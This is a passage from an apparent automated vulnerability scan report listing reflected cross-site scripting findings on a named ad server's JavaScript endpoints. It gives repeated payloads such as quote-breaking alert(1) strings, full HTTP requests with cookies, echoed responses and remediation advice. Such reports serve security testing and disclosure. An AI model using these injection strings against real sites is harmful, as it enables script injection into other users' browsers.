FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:693e2";alert(1)//dacff80c547;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=131 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:53 GMT Connection: close Content-Length: 2524
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',693e2";alert(1)//dacff80c547';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,693e2";alert(1)//dacff80c547;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a18d5"%3balert(1)//fb81859235a was submitted in the $ parameter. This input was echoed as a18d5";alert(1)//fb81859235a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:a18d5";alert(1)//fb81859235a;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=133 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:51 GMT Connection: close Content-Length: 2511
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',a18d5";alert(1)//fb81859235a';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a18d5";alert(1)//fb81859235a;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6763'%3balert(1)//afd391d5acc was submitted in the $ parameter. This input was echoed as a6763';alert(1)//afd391d5acc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=a6763'%3balert(1)//afd391d5acc&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a6763';alert(1)//afd391d5acc;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:54 GMT
Connection: close
Content-Length: 2524

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',a6763';alert(1)//afd391d5acc';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a6763';alert(1)//afd391d5acc;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0b32'%3balert(1)//539eff4924d was submitted in the $ parameter. This input was echoed as a0b32';alert(1)//539eff4924d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a0b32';alert(1)//539eff4924d;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2511

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',a0b32';alert(1)//539eff4924d';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a0b32';alert(1)//539eff4924d;z="+Math.random();}
1.84. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://c7.zedo.com
Path: /bar/v16-401/c5/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e0a0'-alert(1)-'be3b67982cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?8e0a0'-alert(1)-'be3b67982cf=1 HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 985
Content-Type: application/x-javascript
Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=412
Expires: Thu, 03 Feb 2011 16:18:54 GMT
Date: Thu, 03 Feb 2011 16:12:02 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c38c1'%3balert(1)//9f2a1335fe8 was submitted in the q parameter. This input was echoed as c38c1';alert(1)//9f2a1335fe8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2508

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='c38c1';alert(1)//9f2a1335fe8';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=c38c1';alert(1)//9f2a1335fe8;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e516d"%3balert(1)//8a8f531ed29 was submitted in the q parameter. This input was echoed as e516d";alert(1)//8a8f531ed29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2508

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='e516d";alert(1)//8a8f531ed29';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=e516d";alert(1)//8a8f531ed29;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed98c"%3balert(1)//2c617412c80 was submitted in the q parameter. This input was echoed as ed98c";alert(1)//2c617412c80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=ed98c"%3balert(1)//2c617412c80&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2521

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='ed98c";alert(1)//2c617412c80';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=ed98c";alert(1)//2c617412c80;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f44fa'%3balert(1)//438e80c48dc was submitted in the q parameter. This input was echoed as f44fa';alert(1)//438e80c48dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=f44fa'%3balert(1)//438e80c48dc&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2521

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='f44fa';alert(1)//438e80c48dc';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=f44fa';alert(1)//438e80c48dc;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38718"%3balert(1)//62cf392d211 was submitted in the $ parameter. This input was echoed as 38718";alert(1)//62cf392d211 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=38718"%3balert(1)//62cf392d211&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:38718";alert(1)//62cf392d211;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2512

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',38718";alert(1)//62cf392d211';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,38718";alert(1)//62cf392d211;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aa1'%3balert(1)//71dd49f8f74 was submitted in the $ parameter. This input was echoed as 98aa1';alert(1)//71dd49f8f74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
